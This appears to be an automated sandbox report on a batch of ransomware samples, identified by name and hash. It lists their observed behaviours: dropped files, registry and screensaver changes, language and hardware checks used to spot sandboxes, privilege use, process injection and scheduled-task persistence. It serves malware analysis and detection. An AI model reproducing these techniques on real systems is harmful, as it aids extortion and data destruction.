HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-4b0ce2c3039c4ca3c1c3ced6df016da22e19c66cc70901c172659a0c0c1c403e.exe File created C:\Program Files\7-Zip\History.txt.exe HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-4b0ce2c3039c4ca3c1c3ced6df016da22e19c66cc70901c172659a0c0c1c403e.exe File created C:\Program Files\7-Zip\Lang\az.txt.exe HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-4b0ce2c3039c4ca3c1c3ced6df016da22e19c66cc70901c172659a0c0c1c403e.exe File created C:\Program Files\7-Zip\Lang\da.txt.exe HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-4b0ce2c3039c4ca3c1c3ced6df016da22e19c66cc70901c172659a0c0c1c403e.exe File created C:\Program Files\7-Zip\Lang\de.txt.exe HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-4b0ce2c3039c4ca3c1c3ced6df016da22e19c66cc70901c172659a0c0c1c403e.exe File created C:\Program Files\7-Zip\7-zip.dll HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-4b0ce2c3039c4ca3c1c3ced6df016da22e19c66cc70901c172659a0c0c1c403e.exe File opened for modification C:\Program Files\7-Zip\Lang\bg.txt HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-4b0ce2c3039c4ca3c1c3ced6df016da22e19c66cc70901c172659a0c0c1c403e.exe File opened for modification C:\Program Files\7-Zip\Lang\br.txt HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-4b0ce2c3039c4ca3c1c3ced6df016da22e19c66cc70901c172659a0c0c1c403e.exe File created C:\Program Files\7-Zip\7zG.exe.exe HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-4b0ce2c3039c4ca3c1c3ced6df016da22e19c66cc70901c172659a0c0c1c403e.exe File opened for modification C:\Program Files\7-Zip\Lang\an.txt HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-4b0ce2c3039c4ca3c1c3ced6df016da22e19c66cc70901c172659a0c0c1c403e.exe File opened for modification C:\Program Files\7-Zip\Lang\ar.txt HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-4b0ce2c3039c4ca3c1c3ced6df016da22e19c66cc70901c172659a0c0c1c403e.exe -
Drops file in Windows directory 2 IoCs
description ioc Process File opened for modification C:\Windows\xk.exe Trojan-Ransom.Win32.Blocker.kpuo-11d1384cb603f6ffceafc24e80508686372659a95c8388c187d992b4d946de24.exe File created C:\Windows\xk.exe Trojan-Ransom.Win32.Blocker.kpuo-11d1384cb603f6ffceafc24e80508686372659a95c8388c187d992b4d946de24.exe -
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 14232 sc.exe 10972 sc.exe 8760 sc.exe 2608 sc.exe 8972 sc.exe 15884 sc.exe 5344 sc.exe 14536 sc.exe 16512 sc.exe 12856 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
Program crash 3 IoCs
pid pid_target Process procid_target 2388 2276 WerFault.exe 112 2388 1600 WerFault.exe 119 5268 224 WerFault.exe 159 -
System Location Discovery: System Language Discovery 1 TTPs 30 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Encoder.mjb-917cf2ed059e7975f294f97be66df901a8d70d6077fc64396a5c9e2bc47b9290.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.MSIL.Gen.gen-0a18a0f93588ad4d852d50ec68f594b21babcb9889b90f2134e2f04f82f8b6b0.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language File1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Blocker.nage-ebe3c86f238c4b3cbe2d52e93471c1ca94cb7c9d449108300294256e837a71a9.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.MSIL.Blocker.gen-649d5c728c759d6185e1420b9eeaeb370ae7c080782b7a0565cedb7b53c2c50d.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.MSIL.Encoder.gen-fb81347ec3a8abc5259abd425aa435ab166eb69a5c76baef19ae23f6455c1484.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.Win32.GandCrypt.gen-1af0659e1375552c88339146c38d870f9808fd4bfcf93d026aa0698aa89cdf23.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language System64.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ddd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dw20.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Foreign.nvzm-3e554d5764acaec3baab31ab7ac0d1ffea39dc105435b81cb784fa0ffd0a203a.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.MSIL.Blocker.gen-cebc7e39289aece621aee501077f89afb9d47e26453e940e0c111246e2bf84e8.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Cryptor.eev-89cc8fa7a2d2fef1b7e292682121cc65dedb8e0d5cd926977dfae49f25410f4c.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Foreign.nvzm-3e554d5764acaec3baab31ab7ac0d1ffea39dc105435b81cb784fa0ffd0a203a.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.Win32.Generic-f15f03025e1c98bfc72c1116e9f06073704073475fa433aeb17179ed8ff95a3f.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.Win32.Stop.gen-8a9aa2c6397edec14772b76171a223259ec3190e3cef4cf6774d2eb9435a30f6.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Blocker.kpuo-11d1384cb603f6ffceafc24e80508686372659a95c8388c187d992b4d946de24.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Darkside.m-1cc7c198a8a2c935fd6f07970479e544f5b35a8eb3173de0305ebdf76a0988cb.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.GandCrypt.abw-9becd904847b2dabd1a03df45210d7233fdda9927eac6d87c75bab53947ce5f1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Blocker.jhat-2de9dda59b7761de1a9b33641753443c4c3e477fec3bf9b88182062f03ec0608.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RUNDLL32.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language winsrc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe -
NSIS installer 2 IoCs
resource yara_rule behavioral1/files/0x000a000000023b7f-195.dat nsis_installer_1 behavioral1/files/0x000a000000023b7f-195.dat nsis_installer_2 -
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName taskmgr.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString dw20.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 15864 timeout.exe -
Discovers systems in the same network 1 TTPs 1 IoCs
pid Process 6916 net.exe -
Enumerates system info in registry 2 TTPs 2 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU dw20.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS dw20.exe -
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
pid Process 5456 ipconfig.exe -
Modifies Control Panel 4 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\Desktop\ Trojan-Ransom.Win32.Blocker.kpuo-11d1384cb603f6ffceafc24e80508686372659a95c8388c187d992b4d946de24.exe Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\Desktop\SCRNSAVE.EXE = "C:\\Windows\\system32\\Mig~mig.SCR" Trojan-Ransom.Win32.Blocker.kpuo-11d1384cb603f6ffceafc24e80508686372659a95c8388c187d992b4d946de24.exe Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\Desktop\ScreenSaverIsSecure = "0" Trojan-Ransom.Win32.Blocker.kpuo-11d1384cb603f6ffceafc24e80508686372659a95c8388c187d992b4d946de24.exe Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\Desktop\ScreenSaveTimeOut = "600" Trojan-Ransom.Win32.Blocker.kpuo-11d1384cb603f6ffceafc24e80508686372659a95c8388c187d992b4d946de24.exe -
Modifies registry class 7 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\1d46f1f8\DefaultIcon Trojan-Ransom.Win32.Darkside.m-1cc7c198a8a2c935fd6f07970479e544f5b35a8eb3173de0305ebdf76a0988cb.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\1d46f1f8 Trojan-Ransom.Win32.Darkside.m-1cc7c198a8a2c935fd6f07970479e544f5b35a8eb3173de0305ebdf76a0988cb.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\1d46f1f8\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\1d46f1f8.ico" Trojan-Ransom.Win32.Darkside.m-1cc7c198a8a2c935fd6f07970479e544f5b35a8eb3173de0305ebdf76a0988cb.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ Trojan-Ransom.Win32.Foreign.nvzm-3e554d5764acaec3baab31ab7ac0d1ffea39dc105435b81cb784fa0ffd0a203a.exe Key created \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings HEUR-Trojan-Ransom.MSIL.Gen.gen-0a18a0f93588ad4d852d50ec68f594b21babcb9889b90f2134e2f04f82f8b6b0.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.1d46f1f8 Trojan-Ransom.Win32.Darkside.m-1cc7c198a8a2c935fd6f07970479e544f5b35a8eb3173de0305ebdf76a0988cb.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.1d46f1f8\ = "1d46f1f8" Trojan-Ransom.Win32.Darkside.m-1cc7c198a8a2c935fd6f07970479e544f5b35a8eb3173de0305ebdf76a0988cb.exe -
Modifies registry key 1 TTPs 2 IoCs
pid Process 13328 reg.exe 12596 reg.exe -
Opens file in notepad (likely ransom note) 2 IoCs
pid Process 7136 NOTEPAD.EXE 3392 NOTEPAD.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2456 schtasks.exe 17176 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2308 taskmgr.exe 2308 taskmgr.exe 2308 taskmgr.exe 2308 taskmgr.exe 2308 taskmgr.exe 2308 taskmgr.exe 2308 taskmgr.exe 2308 taskmgr.exe 924 taskmgr.exe 924 taskmgr.exe 924 taskmgr.exe 924 taskmgr.exe 924 taskmgr.exe 924 taskmgr.exe 924 taskmgr.exe 924 taskmgr.exe 924 taskmgr.exe 924 taskmgr.exe 924 taskmgr.exe 924 taskmgr.exe 924 taskmgr.exe 924 taskmgr.exe 924 taskmgr.exe 924 taskmgr.exe 924 taskmgr.exe 924 taskmgr.exe 924 taskmgr.exe 924 taskmgr.exe 924 taskmgr.exe 924 taskmgr.exe 924 taskmgr.exe 924 taskmgr.exe 924 taskmgr.exe 924 taskmgr.exe 924 taskmgr.exe 924 taskmgr.exe 924 taskmgr.exe 924 taskmgr.exe 924 taskmgr.exe 924 taskmgr.exe 924 taskmgr.exe 924 taskmgr.exe 924 taskmgr.exe 924 taskmgr.exe 924 taskmgr.exe 924 taskmgr.exe 4380 powershell.exe 4380 powershell.exe 924 taskmgr.exe 924 taskmgr.exe 924 taskmgr.exe 924 taskmgr.exe 924 taskmgr.exe 924 taskmgr.exe 924 taskmgr.exe 924 taskmgr.exe 924 taskmgr.exe 924 taskmgr.exe 924 taskmgr.exe 924 taskmgr.exe 924 taskmgr.exe 924 taskmgr.exe 924 taskmgr.exe 924 taskmgr.exe -
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
pid Process 1008 7zFM.exe 924 taskmgr.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 6128 KA57j.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeRestorePrivilege 1008 7zFM.exe Token: 35 1008 7zFM.exe Token: SeSecurityPrivilege 1008 7zFM.exe Token: SeDebugPrivilege 2308 taskmgr.exe Token: SeSystemProfilePrivilege 2308 taskmgr.exe Token: SeCreateGlobalPrivilege 2308 taskmgr.exe Token: SeDebugPrivilege 924 taskmgr.exe Token: SeSystemProfilePrivilege 924 taskmgr.exe Token: SeCreateGlobalPrivilege 924 taskmgr.exe Token: 33 2308 taskmgr.exe Token: SeIncBasePriorityPrivilege 2308 taskmgr.exe Token: SeDebugPrivilege 4380 powershell.exe Token: SeDebugPrivilege 4872 HEUR-Trojan-Ransom.MSIL.Blocker.gen-a1d6d6618d366d7f5e4f2eef7ed3d5f195b6ea591ea3067270a34f67d2ca2de6.exe Token: SeIncreaseQuotaPrivilege 1996 wmic.exe Token: SeSecurityPrivilege 1996 wmic.exe Token: SeTakeOwnershipPrivilege 1996 wmic.exe Token: SeLoadDriverPrivilege 1996 wmic.exe Token: SeSystemProfilePrivilege 1996 wmic.exe Token: SeSystemtimePrivilege 1996 wmic.exe Token: SeProfSingleProcessPrivilege 1996 wmic.exe Token: SeIncBasePriorityPrivilege 1996 wmic.exe Token: SeCreatePagefilePrivilege 1996 wmic.exe Token: SeBackupPrivilege 1996 wmic.exe Token: SeRestorePrivilege 1996 wmic.exe Token: SeShutdownPrivilege 1996 wmic.exe Token: SeDebugPrivilege 1996 wmic.exe Token: SeSystemEnvironmentPrivilege 1996 wmic.exe Token: SeRemoteShutdownPrivilege 1996 wmic.exe Token: SeUndockPrivilege 1996 wmic.exe Token: SeManageVolumePrivilege 1996 wmic.exe Token: 33 1996 wmic.exe Token: 34 1996 wmic.exe Token: 35 1996 wmic.exe Token: 36 1996 wmic.exe Token: SeIncreaseQuotaPrivilege 3680 wmic.exe Token: SeSecurityPrivilege 3680 wmic.exe Token: SeTakeOwnershipPrivilege 3680 wmic.exe Token: SeLoadDriverPrivilege 3680 wmic.exe Token: SeSystemProfilePrivilege 3680 wmic.exe Token: SeSystemtimePrivilege 3680 wmic.exe Token: SeProfSingleProcessPrivilege 3680 wmic.exe Token: SeIncBasePriorityPrivilege 3680 wmic.exe Token: SeCreatePagefilePrivilege 3680 wmic.exe Token: SeBackupPrivilege 3680 wmic.exe Token: SeRestorePrivilege 3680 wmic.exe Token: SeShutdownPrivilege 3680 wmic.exe Token: SeDebugPrivilege 3680 wmic.exe Token: SeSystemEnvironmentPrivilege 3680 wmic.exe Token: SeRemoteShutdownPrivilege 3680 wmic.exe Token: SeUndockPrivilege 3680 wmic.exe Token: SeManageVolumePrivilege 3680 wmic.exe Token: 33 3680 wmic.exe Token: 34 3680 wmic.exe Token: 35 3680 wmic.exe Token: 36 3680 wmic.exe Token: SeBackupPrivilege 4264 dw20.exe Token: SeBackupPrivilege 4264 dw20.exe Token: SeIncreaseQuotaPrivilege 3688 wmic.exe Token: SeSecurityPrivilege 3688 wmic.exe Token: SeTakeOwnershipPrivilege 3688 wmic.exe Token: SeLoadDriverPrivilege 3688 wmic.exe Token: SeSystemProfilePrivilege 3688 wmic.exe Token: SeSystemtimePrivilege 3688 wmic.exe Token: SeProfSingleProcessPrivilege 3688 wmic.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 1008 7zFM.exe 1008 7zFM.exe 2308 taskmgr.exe 2308 taskmgr.exe 2308 taskmgr.exe 2308 taskmgr.exe 2308 taskmgr.exe 2308 taskmgr.exe 2308 taskmgr.exe 2308 taskmgr.exe 2308 taskmgr.exe 2308 taskmgr.exe 2308 taskmgr.exe 2308 taskmgr.exe 2308 taskmgr.exe 2308 taskmgr.exe 2308 taskmgr.exe 2308 taskmgr.exe 2308 taskmgr.exe 2308 taskmgr.exe 2308 taskmgr.exe 2308 taskmgr.exe 2308 taskmgr.exe 2308 taskmgr.exe 2308 taskmgr.exe 924 taskmgr.exe 2308 taskmgr.exe 924 taskmgr.exe 2308 taskmgr.exe 924 taskmgr.exe 2308 taskmgr.exe 924 taskmgr.exe 2308 taskmgr.exe 924 taskmgr.exe 2308 taskmgr.exe 924 taskmgr.exe 2308 taskmgr.exe 924 taskmgr.exe 2308 taskmgr.exe 924 taskmgr.exe 2308 taskmgr.exe 924 taskmgr.exe 2308 taskmgr.exe 924 taskmgr.exe 2308 taskmgr.exe 924 taskmgr.exe 924 taskmgr.exe 924 taskmgr.exe 924 taskmgr.exe 924 taskmgr.exe 924 taskmgr.exe 924 taskmgr.exe 924 taskmgr.exe 924 taskmgr.exe 924 taskmgr.exe 924 taskmgr.exe 924 taskmgr.exe 924 taskmgr.exe 924 taskmgr.exe 924 taskmgr.exe 924 taskmgr.exe 924 taskmgr.exe 924 taskmgr.exe 924 taskmgr.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 2308 taskmgr.exe 2308 taskmgr.exe 2308 taskmgr.exe 2308 taskmgr.exe 2308 taskmgr.exe 2308 taskmgr.exe 2308 taskmgr.exe 2308 taskmgr.exe 2308 taskmgr.exe 2308 taskmgr.exe 2308 taskmgr.exe 2308 taskmgr.exe 2308 taskmgr.exe 2308 taskmgr.exe 2308 taskmgr.exe 2308 taskmgr.exe 2308 taskmgr.exe 2308 taskmgr.exe 2308 taskmgr.exe 2308 taskmgr.exe 2308 taskmgr.exe 2308 taskmgr.exe 2308 taskmgr.exe 924 taskmgr.exe 2308 taskmgr.exe 924 taskmgr.exe 2308 taskmgr.exe 924 taskmgr.exe 2308 taskmgr.exe 924 taskmgr.exe 2308 taskmgr.exe 924 taskmgr.exe 2308 taskmgr.exe 924 taskmgr.exe 2308 taskmgr.exe 924 taskmgr.exe 2308 taskmgr.exe 924 taskmgr.exe 2308 taskmgr.exe 924 taskmgr.exe 2308 taskmgr.exe 924 taskmgr.exe 2308 taskmgr.exe 924 taskmgr.exe 924 taskmgr.exe 924 taskmgr.exe 924 taskmgr.exe 924 taskmgr.exe 924 taskmgr.exe 924 taskmgr.exe 924 taskmgr.exe 924 taskmgr.exe 924 taskmgr.exe 924 taskmgr.exe 924 taskmgr.exe 924 taskmgr.exe 924 taskmgr.exe 924 taskmgr.exe 924 taskmgr.exe 924 taskmgr.exe 924 taskmgr.exe 924 taskmgr.exe 924 taskmgr.exe 924 taskmgr.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
pid Process 2036 Trojan-Ransom.Win32.Blocker.kpuo-11d1384cb603f6ffceafc24e80508686372659a95c8388c187d992b4d946de24.exe 5960 Trojan-Ransom.Win32.Foreign.nvzm-3e554d5764acaec3baab31ab7ac0d1ffea39dc105435b81cb784fa0ffd0a203a.exe 1532 winsrc.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2308 wrote to memory of 924 2308 taskmgr.exe 91 PID 2308 wrote to memory of 924 2308 taskmgr.exe 91 PID 4380 wrote to memory of 4304 4380 powershell.exe 99 PID 4380 wrote to memory of 4304 4380 powershell.exe 99 PID 4304 wrote to memory of 956 4304 cmd.exe 104 PID 4304 wrote to memory of 956 4304 cmd.exe 104 PID 4304 wrote to memory of 956 4304 cmd.exe 104 PID 4304 wrote to memory of 4872 4304 cmd.exe 105 PID 4304 wrote to memory of 4872 4304 cmd.exe 105 PID 4304 wrote to memory of 5056 4304 cmd.exe 106 PID 4304 wrote to memory of 5056 4304 cmd.exe 106 PID 4304 wrote to memory of 5056 4304 cmd.exe 106 PID 4304 wrote to memory of 2876 4304 cmd.exe 107 PID 4304 wrote to memory of 2876 4304 cmd.exe 107 PID 4304 wrote to memory of 2876 4304 cmd.exe 107 PID 4304 wrote to memory of 3228 4304 cmd.exe 108 PID 4304 wrote to memory of 3228 4304 cmd.exe 108 PID 4304 wrote to memory of 2928 4304 cmd.exe 109 PID 4304 wrote to memory of 2928 4304 cmd.exe 109 PID 4304 wrote to memory of 2928 4304 cmd.exe 109 PID 4304 wrote to memory of 4644 4304 cmd.exe 110 PID 4304 wrote to memory of 4644 4304 cmd.exe 110 PID 4304 wrote to memory of 2276 4304 cmd.exe 112 PID 4304 wrote to memory of 2276 4304 cmd.exe 112 PID 4304 wrote to memory of 2276 4304 cmd.exe 112 PID 4304 wrote to memory of 3432 4304 cmd.exe 113 PID 4304 wrote to memory of 3432 4304 cmd.exe 113 PID 4304 wrote to memory of 3432 4304 cmd.exe 113 PID 3432 wrote to memory of 1996 3432 HEUR-Trojan-Ransom.Win32.Generic-f15f03025e1c98bfc72c1116e9f06073704073475fa433aeb17179ed8ff95a3f.exe 114 PID 3432 wrote to memory of 1996 3432 HEUR-Trojan-Ransom.Win32.Generic-f15f03025e1c98bfc72c1116e9f06073704073475fa433aeb17179ed8ff95a3f.exe 114 PID 3432 wrote to memory of 1996 3432 HEUR-Trojan-Ransom.Win32.Generic-f15f03025e1c98bfc72c1116e9f06073704073475fa433aeb17179ed8ff95a3f.exe 114 PID 2928 wrote to memory of 1052 2928 HEUR-Trojan-Ransom.MSIL.Gen.gen-0a18a0f93588ad4d852d50ec68f594b21babcb9889b90f2134e2f04f82f8b6b0.exe 132 PID 2928 wrote to memory of 1052 2928 HEUR-Trojan-Ransom.MSIL.Gen.gen-0a18a0f93588ad4d852d50ec68f594b21babcb9889b90f2134e2f04f82f8b6b0.exe 132 PID 2928 wrote to memory of 1052 2928 HEUR-Trojan-Ransom.MSIL.Gen.gen-0a18a0f93588ad4d852d50ec68f594b21babcb9889b90f2134e2f04f82f8b6b0.exe 132 PID 4304 wrote to memory of 1600 4304 cmd.exe 119 PID 4304 wrote to memory of 1600 4304 cmd.exe 119 PID 4304 wrote to memory of 1600 4304 cmd.exe 119 PID 1052 wrote to memory of 3440 1052 WScript.exe 121 PID 1052 wrote to memory of 3440 1052 WScript.exe 121 PID 1052 wrote to memory of 3440 1052 WScript.exe 121 PID 3432 wrote to memory of 3680 3432 HEUR-Trojan-Ransom.Win32.Generic-f15f03025e1c98bfc72c1116e9f06073704073475fa433aeb17179ed8ff95a3f.exe 123 PID 3432 wrote to memory of 3680 3432 HEUR-Trojan-Ransom.Win32.Generic-f15f03025e1c98bfc72c1116e9f06073704073475fa433aeb17179ed8ff95a3f.exe 123 PID 3432 wrote to memory of 3680 3432 HEUR-Trojan-Ransom.Win32.Generic-f15f03025e1c98bfc72c1116e9f06073704073475fa433aeb17179ed8ff95a3f.exe 123 PID 1052 wrote to memory of 2156 1052 WScript.exe 122 PID 1052 wrote to memory of 2156 1052 WScript.exe 122 PID 4304 wrote to memory of 4292 4304 cmd.exe 125 PID 4304 wrote to memory of 4292 4304 cmd.exe 125 PID 4304 wrote to memory of 3532 4304 cmd.exe 127 PID 4304 wrote to memory of 3532 4304 cmd.exe 127 PID 4304 wrote to memory of 3532 4304 cmd.exe 127 PID 2156 wrote to memory of 4596 2156 File2.exe 128 PID 2156 wrote to memory of 4596 2156 File2.exe 128 PID 3432 wrote to memory of 3688 3432 HEUR-Trojan-Ransom.Win32.Generic-f15f03025e1c98bfc72c1116e9f06073704073475fa433aeb17179ed8ff95a3f.exe 145 PID 3432 wrote to memory of 3688 3432 HEUR-Trojan-Ransom.Win32.Generic-f15f03025e1c98bfc72c1116e9f06073704073475fa433aeb17179ed8ff95a3f.exe 145 PID 3432 wrote to memory of 3688 3432 HEUR-Trojan-Ransom.Win32.Generic-f15f03025e1c98bfc72c1116e9f06073704073475fa433aeb17179ed8ff95a3f.exe 145 PID 3532 wrote to memory of 4512 3532 Trojan-Ransom.Win32.Blocker.jhat-2de9dda59b7761de1a9b33641753443c4c3e477fec3bf9b88182062f03ec0608.exe 133 PID 3532 wrote to memory of 4512 3532 Trojan-Ransom.Win32.Blocker.jhat-2de9dda59b7761de1a9b33641753443c4c3e477fec3bf9b88182062f03ec0608.exe 133 PID 3532 wrote to memory of 4512 3532 Trojan-Ransom.Win32.Blocker.jhat-2de9dda59b7761de1a9b33641753443c4c3e477fec3bf9b88182062f03ec0608.exe 133 PID 5056 wrote to memory of 4412 5056 HEUR-Trojan-Ransom.MSIL.Blocker.gen-cebc7e39289aece621aee501077f89afb9d47e26453e940e0c111246e2bf84e8.exe 134 PID 5056 wrote to memory of 4412 5056 HEUR-Trojan-Ransom.MSIL.Blocker.gen-cebc7e39289aece621aee501077f89afb9d47e26453e940e0c111246e2bf84e8.exe 134 PID 5056 wrote to memory of 4412 5056 HEUR-Trojan-Ransom.MSIL.Blocker.gen-cebc7e39289aece621aee501077f89afb9d47e26453e940e0c111246e2bf84e8.exe 134 PID 4304 wrote to memory of 2036 4304 cmd.exe 135 PID 4304 wrote to memory of 2036 4304 cmd.exe 135 PID 4304 wrote to memory of 2036 4304 cmd.exe 135 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 2 IoCs
pid Process 13836 attrib.exe 11216 attrib.exe
Processes
-
C:\Program Files\7-Zip\7zFM.exe"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\RNSM00436.7z"1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1008
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2308 -
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /12⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:924
-
-
